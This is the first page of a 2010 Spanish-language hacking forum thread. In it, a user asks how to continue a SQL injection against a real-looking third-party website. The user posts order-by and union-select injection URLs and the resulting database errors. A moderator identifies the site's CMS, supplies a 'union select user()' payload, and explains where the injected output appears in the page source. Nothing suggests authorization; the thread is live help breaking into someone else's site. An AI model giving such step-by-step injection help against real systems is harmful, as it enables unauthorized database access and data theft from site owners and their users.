elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda como seguir con SQL Inyection
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda como seguir con SQL Inyection  (Leído 7,746 veces)
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Ayuda como seguir con SQL Inyection
« en: 22 Marzo 2010, 20:08 pm »

Salu2,

Tengo una página que he podido, por lo menos saber las columnas de su base de datos que tiene, está creada en php y core sobre Mysql:

http://www.lapaginaweb.com/index.php?contingut=2&codi=-1%20order%20by%205/*

Poniendo al final /* me deja ver que hay 5 porque si pongo 6 me peta.

El problema está seguir, he provado con:

-1+union+all+select 1,2,3,4,5/*

Y nada me da este error:

No s'ha pogut llegir select * from contingut where codi=-1 union all select 1,2,3,4,5/*

Alguien sabe como proseguir.... gracias para la ayuda a un newbaby!!!!!
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #1 en: 22 Marzo 2010, 20:45 pm »

talves porque necesita procesar un valor válido para poder mostrarse.
me da la impresión de que es blind sql o tendrás que ingeniartelas para fabricar una query tan fiel como la original y solo modificando un valor de una columna.

PD:
el código original no será este?
Citar
No s'ha pogut llegir select articles2.*, articles2_idioma.text as descr, articles2_idioma.text_curt as text_curt from articles2, articles2_idioma where codi= and id_idioma=2 and codi=id_article
« Última modificación: 22 Marzo 2010, 20:47 pm por WHK » En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #2 en: 22 Marzo 2010, 20:53 pm »

Salu2, no se donde has sacado el codigo pero no es este intentare con blind sql, no se si me servirá......... si me puedes aportar algo mas me lo dices mil gracias
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #3 en: 22 Marzo 2010, 21:06 pm »

Bueno, por lo que he podido averiguar, ese sistema web que observas es un sistema CMS para shopping creado por
http://www.comunicatek.com/

y hay varias por internet.

yo mientras tanto pruebo acá y tu pruebas ayá.

Ese sitio web debe tener un buscador:
http://ejemplo.com/buscador.php?idioma=2 union select user(),2,3 --
u00061@localhost

con eso ya podrías inyectar libremente.
Lo raro que me fijé en este sistema es que cuando intentas obtener las columnas con order by siempre te retorna un numero mas elevado de columnas que el real, por ejemplo a mi me retornaba que habian 4 columnas pero eran solo 3 al igual que en la tabla de productos, también es resultado menos uno.

el resultado queda en el código fuente, no lo verás desde el explorador directamente.
Para eso haz view-source:htt://ejemplo... y buscas esto:
Código:
<option value='33'><option value='
ahi en ese valor te aparecerá tu inyección.

Saludos.
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #4 en: 22 Marzo 2010, 21:06 pm »

De donde has cacado el codigo????
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #5 en: 22 Marzo 2010, 21:07 pm »

googleando :P y viendo el código fuente, etc
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #6 en: 22 Marzo 2010, 21:10 pm »

No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc

mmmmmm
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #7 en: 22 Marzo 2010, 21:12 pm »

OK PROVANDO, y como dices tu es de esta gente si !!!
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #8 en: 22 Marzo 2010, 21:13 pm »

prueba con el buscador como te puse mas arriba
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #9 en: 22 Marzo 2010, 21:18 pm »

no tiene buscador............. buscando mas
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como seguir en Python
Scripting
Fyrox 1 2,082 Último mensaje 28 Septiembre 2011, 04:05 am
por Novlucker
Consejo de que seguir estudiando...(Ayuda)
.NET (C#, VB.NET, ASP)
Senior++ 4 4,184 Último mensaje 31 Marzo 2012, 09:57 am
por Senior++
¿como me recomiendan seguir? (siguiendo la ruta de validacion de un .exe)
Ingeniería Inversa
tomasjrl 4 2,837 Último mensaje 2 Octubre 2014, 05:52 am
por tomasjrl
¿Como seguir con Java?
Programación General
JVulture 2 2,013 Último mensaje 3 Noviembre 2015, 11:18 am
por WhiteDeMoN
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines